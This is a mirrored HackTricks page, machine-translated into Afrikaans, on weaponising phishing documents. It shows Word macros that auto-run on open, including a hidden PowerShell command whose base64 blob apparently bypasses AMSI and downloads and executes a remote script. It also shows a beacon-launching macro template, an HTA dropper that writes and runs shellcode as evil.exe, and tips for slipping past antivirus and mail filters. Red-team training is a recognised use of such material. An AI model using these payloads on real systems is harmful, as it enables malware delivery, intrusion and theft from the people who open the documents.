Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00

Translator e2cf4aff4b Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

2024-05-05 22:31:04 +00:00

9.1 KiB

Raw Blame History

Hengel Lêers & Dokumente

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Werk jy by 'n cybersekuriteitsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die INSKRYWINGSPLANNE!
Ontdek Die PEASS-familie, ons versameling eksklusiewe NFT's
Kry die amptelike PEASS & HackTricks-klere
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
Deel jou hengeltruuks deur PR's in te dien by die hacktricks-opslag en hacktricks-cloud-opslag.

Kantoor Dokumente

Microsoft Word voer lêerdata-validering uit voordat 'n lêer geopen word. Data-validering word uitgevoer in die vorm van datastruktuuridentifikasie, teen die OfficeOpenXML-standaard. As enige fout tydens die datastruktuuridentifikasie voorkom, sal die geanaliseerde lêer nie geopen word nie.

Gewoonlik gebruik Word-lêers wat makro's bevat die .docm-uitbreiding. Dit is egter moontlik om die lêer te hernoem deur die lêeruitbreiding te verander en steeds hul makro-uitvoeringsvermoëns te behou.
Byvoorbeeld, 'n RTF-lêer ondersteun nie makro's, volgens ontwerp nie, maar 'n DOCM-lêer wat na RTF hernoem is, sal deur Microsoft Word hanteer word en sal in staat wees om makro-uitvoering uit te voer.
Dieselfde interne en meganismes geld vir alle sagteware van die Microsoft Office-pakket (Excel, PowerPoint ens.).

Jy kan die volgende bevel gebruik om te kontroleer watter uitbreidings deur sommige Office-programme uitgevoer gaan word:

assoc | findstr /i "word excel powerp"

Eksterne Beeldlading

Gaan na: Invoeg --> Vinnige Dele --> Veld
Kategorieë: Skakels en Verwysings, Veldname: includePicture, en Lêernaam of URL: http://<ip>/whatever

Makro's Agterdeur

Dit is moontlik om makro's te gebruik om willekeurige kode vanuit die dokument uit te voer.

Outomatiese laai funksies

Hoe algemener hulle is, hoe waarskynliker is dit dat die AV hulle sal opspoor.

AutoOpen()
Document_Open()

Makro's Kode Voorbeelde

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Verwyder metadata handmatig

Gaan na Lêer > Inligting > Inspekteer Dokument > Inspekteer Dokument, wat die Dokument Inspekteerder sal oopmaak. Klik op Inspekteer en dan op Verwyder Alles langs Dokumenteienskappe en Persoonlike Inligting.

Dok Extensie

Wanneer klaar, kies Stoor as tipe-keuslys, verander die formaat van .docx na Word 97-2003 .doc.
Doen dit omdat jy nie makro's binne 'n .docx kan stoor nie en daar is 'n stigma rondom die makro-geaktiveerde .docm-uitbreiding (bv. die duimnael-ikoon het 'n groot ! en sommige web/e-pos hekke blokkeer hulle heeltemal). Daarom is hierdie oudtydse .doc-uitbreiding die beste kompromie.

Skadelike Makro's Opgewek

HTA-lêers

'n HTA is 'n Windows-program wat HTML en skripspraak (soos VBScript en JScript) kombineer. Dit genereer die gebruikerskoppelvlak en voer uit as 'n "volledig vertroude" toepassing, sonder die beperkings van 'n blaaier se veiligheidsmodel.

'n HTA word uitgevoer met behulp van mshta.exe, wat tipies saam met Internet Explorer geïnstalleer word, wat mshta afhanklik van IE maak. As dit gedeïnstalleer is, sal HTA's nie kan uitvoer nie.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Afdwing van NTLM-verifikasie

Daar is verskeie maniere om NTLM-verifikasie "op afstand" af te dwing, byvoorbeeld, jy kan onsigbare afbeeldings by e-posse of HTML voeg wat die gebruiker sal benader (selfs HTTP MitM?). Of stuur die slagoffer die adres van lêers wat 'n verifikasie sal trigger net vir die oopmaak van die vouer.

Kyk na hierdie idees en meer op die volgende bladsye:

{% content-ref url="../../windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}

{% content-ref url="../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md" %} places-to-steal-ntlm-creds.md {% endcontent-ref %}

NTLM Oordrag

Moenie vergeet dat jy nie net die has of die verifikasie kan steel nie, maar ook NTLM-oordragsaanvalle kan uitvoer:

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Werk jy in 'n cybersekuriteitsmaatskappy? Wil jy jou maatskappy geadverteer sien in HackTricks? of wil jy toegang hê tot die nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat? Kyk na die INSKRYWINGSPLANNE!
Ontdek Die PEASS Familie, ons versameling eksklusiewe NFT's
Kry die amptelike PEASS & HackTricks swag
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg my op Twitter 🐦@carlospolopm.
Deel jou haktruuks deur PR's in te dien by die hacktricks repo en hacktricks-cloud repo.

9.1 KiB Raw Blame History